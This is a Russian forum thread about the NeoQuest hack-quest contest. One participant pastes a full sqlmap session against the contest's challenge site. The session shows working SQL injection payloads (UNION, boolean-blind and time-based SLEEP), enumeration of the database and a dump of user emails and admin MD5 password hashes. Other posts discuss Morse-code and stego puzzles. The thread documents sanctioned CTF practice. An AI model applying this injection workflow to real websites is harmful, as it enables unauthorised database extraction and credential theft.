NeoQuest - 2012: открыта регистрация

Рада (и горда) представить первый хак-квест этого года от нашей компании. Надеюсь, он покажется вам стоящим.


Компания «НеоБИТ» объявляет о начале регистрации участников хакквеста
NeoQUEST-2012

http://neoquest.ru/

Участникам хакквеста предстоит поломать голову над различными задачами информационной безопасности: защищенностью SCADA-систем, криптоанализом, стеганографией, безопасностью операционных систем Windows и Linux и дизассемблированием программ, заняться web hacking’ом и реверсным инжинирингом.

Не важно, является ли информационная безопасность вашей работой или хобби. Если вы способны перехитрить соперника, отыскав в его защите брешь, о которой он и не подозревает, то этот квест - для вас. Он позволит вам продемонстрировать свой уровень и получить море удовольствия от безнаказанного взлома.

Главный приз первого этапа нашего конкурса – ноутбук MacBook Pro.

Регистрация участников начинается 21 февраля 2012
Игра стартует 1 марта 2012
Вся информация о квесте и начало "легеды" - при регистрации

 

я только ноут купил

 

давайте поиграем
1 уровень
дают домен 178.250.245.27
надо найти инфу о типе

 

нашел его, посадил в багажник, еду в подвал выбивать инфу

 

Лолшто? Там вообще-то из бд данные надо вытащить.

 

я уже сделал

 

500 Internal Server Error

 

а когда вернут квест?

 

жду квест..... уже 3й день....

 

Все ок, возвращаем квест! Свеженький, апдейтнутый.

Регистрационная форма - вот тут , краткое описание правил и бонусов - в нашем блоге http://habrahabr.ru/company/neobit/blog/166513/
Приятного прохождения

 

NEOQUEST 2013neoquest.ru
И так что имеем имеем дамп БД к 1 задани
root@cloudbackup:~/sqlmap# python sqlmap.py -u "http://rosquest.ru/index.php?url=6"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:21:29

[07:21:29] [INFO] testing connection to the target url
[07:21:29] [INFO] heuristics detected web page charset 'ascii'
[07:21:29] [INFO] testing if the url is stable, wait a few seconds
[07:21:30] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[07:21:38] [INFO] testing if GET parameter 'url' is dynamic
[07:21:38] [WARNING] GET parameter 'url' does not appear dynamic
[07:21:38] [WARNING] reflective value(s) found and filtering out
[07:21:38] [INFO] heuristic (parsing) test shows that GET parameter 'url' might be injectable (possible DBMS: 'MySQL')
[07:21:38] [INFO] testing for SQL injection on GET parameter 'url'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] Y
[07:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:21:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:21:54] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[07:21:54] [INFO] GET parameter 'url' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[07:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[07:21:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[07:21:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[07:21:56] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[07:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:21:57] [INFO] testing 'MySQL inline queries'
[07:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:21:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[07:21:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[07:22:07] [INFO] GET parameter 'url' is 'MySQL > 5.0.11 AND time-based blind' injectable
[07:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:22:07] [INFO] automatically exten
07.02.13
[INFO] target url appears to have 2 columns in query
[07:22:08] [INFO] GET parameter 'url' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'url' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: url
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: url=6 RLIKE IF(4438=4438,6,0x28)

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x3a6d73703a)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: url=6 AND SLEEP(5)
---
[07:22:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[07:22:15] [INFO] fetched data logged to text files under 'output/rosquest.ru'

[*] shutting down at 07:22:15
[07:25:03] [INFO] testing MySQL
[07:25:03] [WARNING] reflective value(s) found and filtering out
[07:25:03] [INFO] confirming MySQL
[07:25:03] [INFO] the back-end DBMS is MySQL
[07:25:03] [INFO] fetching banner
[07:25:03] [INFO] actively fingerprinting MySQL
[07:25:04] [INFO] executing MySQL comment injection fingerprint
web application technology: Nginx, PHP 5.3.10
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner: '5.1.58'
[07:25:09] [INFO] fetching current user
current user: 'neoquest_web@localhost'
[07:25:09] [INFO] fetching database users password hashes
[07:25:09] [WARNING] the SQL query provided does not return any output
[07:25:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[07:25:09] [INFO] fetching database users
[07:25:10] [INFO] the SQL query used returns 1 entries
[07:25:10] [INFO] retrieved: "'neoquest_web'@'localhost'"
[07:25:10] [INFO] fetching number of password hashes for user 'neoquest_web'
[07:25:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[07:25:10] [INFO] retrieved:
[07:25:10] [INFO] retrieved:
[07:25:10] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[07:25:10] [WARNING] unable to retrieve the number of password hashes for user 'neoquest_web'
[07:25:10] [CRITICAL] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table)
[07:25:10] [INFO] fetching database names
[07:25:10] [INFO] the SQL query used returns 2 entries
[07:25:11] [INFO] retrieved: "information_schema"
[07:25:11] [INFO] retrieved: "neoquest_web"
[07:25:11] [INFO] fetching tables for databases: 'information_schema, neoquest_web'
[07:25:11] [INFO] skipping system databases 'information_schema, mysql'
[07:25:11] [INFO] the SQL query used returns 3 entries
[07:25:11] [INFO] retrieved: "neoquest_web","94fhdi54g8rinnf5548581fjhgdt"
[07:25:11] [INFO] retrieved: "neoquest_web","location"
[07:25:12] [INFO] retrieved: "neoquest_web","users"
Database: neoquest_web
[3 tables]
+------------------------------+
| 94fhdi54g8rinnf5548581fjhgdt |
| location |
| users |
+------------------------------+

[07:25:12] [INFO] fetched data logged to text files under 'output/rosquest.ru'
ССУКА!
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: url
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: url=6 RLIKE IF(4438=4438,6,0x28)

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x3a6d73703a)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: url=6 AND SLEEP(5)
---
[07:28:14] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[07:28:14] [INFO] fetching columns for table 'users' in database 'neoquest_web'
[07:28:15] [WARNING] reflective value(s) found and filtering out
[07:28:15] [INFO] the SQL query used returns 3 entries
[07:28:15] [INFO] retrieved: "id","int(11)"
[07:28:15] [INFO] retrieved: "email","varchar(40)"
[07:28:16] [INFO] retrieved: "role","varchar(50)"
[07:28:16] [INFO] fetching entries for table 'users' in database 'neoquest_web'
[07:28:16] [INFO] the SQL query used returns 10 entries
[07:28:16] [INFO] retrieved: "[email protected]","1","Manager"
[07:28:16] [INFO] retrieved: "[email protected]","2","Admin"
[07:28:16] [INFO] retrieved: "[email protected]","3","Admin"
[07:28:16] [INFO] retrieved: "[email protected]","4","Accountant"
[07:28:17] [INFO] retrieved: "[email protected]","5","Admin"
[07:28:17] [INFO] retrieved: "[email protected]","6","Admin"
[07:28:17] [INFO] retrieved: "[email protected]","7","User"
[07:28:17] [INFO] retrieved: "[email protected]","8","Admin"
[07:28:17] [INFO] retrieved: "[email protected]","9","Admin"
[07:28:17] [INFO] retrieved: "[email protected]","10","Admin"
[07:28:17] [INFO] analyzing table dump for possible password hashes
Database: neoquest_web
Table: users
[10 entries]
+----+------------+--------------------------------+
| id | role | email |
+----+------------+--------------------------------+
| 1 | Manager | [email protected] |
| 2 | Admin | [email protected] |
| 3 | Admin | [email protected] |
| 4 | Accountant | [email protected] |
| 5 | Admin | [email protected] |
| 6 | Admin | [email protected] |
| 7 | User | [email protected] |
| 8 | Admin | [email protected] |
| 9 | Admin | [email protected] |
| 10 | Admin | [email protected] |
+----+------------+--------------------------------+

[07:28:17] [INFO] table 'neoquest_web.users' dumped to CSV file 'output/rosquest.ru/dump/neoquest_web/users.csv'
[07:28:17] [INFO] fetched data logged to text files under 'output/rosquest.ru'
Я сделал это )))

Имеем почты всех кто есть в БД и их хеширвоаные пароли
[08:13:02] [INFO] fetching entries for table '94fhdi54g8rinnf5548581fjhgdt' in database 'neoquest_web'
[08:13:02] [INFO] the SQL query used returns 7 entries
[08:13:02] [INFO] retrieved: "[email protected]","4f507829e3f2a72b4df9de064df76e69","1"
[08:13:02] [INFO] retrieved: "[email protected]","ecb67dd66dd44f787c15d7d231402783","2"
[08:13:02] [INFO] retrieved: "[email protected]","aefebf534eb346df845beb0d72a1fdde","3"
[08:13:02] [INFO] retrieved: "[email protected]","9de638c88a6e61d44fd29b6f48ef879b","4"
[08:13:02] [INFO] retrieved: "[email protected]","50caceceaf185a26cad1ac0bb51fe6ad","5"
[08:13:03] [INFO] retrieved: "[email protected]","0e4a8027f7d9d9b03e01360cc43c26a9","6"
[08:13:03] [INFO] retrieved: "[email protected]","bb9030adff799137c670ca3080399542","7"
[08:13:03] [INFO] analyzing table dump for possible password hashes
[08:13:03] [INFO] recognized possible password hashes in column 'adm_pass'

Вот что имеем по поводу задания МР3 плеером
в начале при ускорении записи и обратном реверсе идет слово РАМ потом по средине азбука морзе в рассшифровке ГЕНАЕ потом в конце если разделить запись на каналы в правом канале слышна морзе ИНИ из этой несурядици должно выйти одно какоето осмысленное слово ответом которго будет хеш сумма МД5

и задание с сноубордистами
с пХЕШЕМ ну нарисовал правеьную картинку 8 на 8 сделал ее серой ка ктот ПХЕШ узнать? и что на скип пассе за циферки через # каким они боком?

Подключайтесь думаем вместе)

Добавлено спустя 9 минут 23 секунды:
Предположительно номер кредитки будет 4701-5959-2764-8440
Но сначала надо авторизироватся на сайте авиакомпании

Добавлено спустя 1 минуту 24 секунды:
РАМ потом идет азбука морзе [--.] [.] [-.] [..] [.] и вторая в правом канале звука [..] [-.] [..]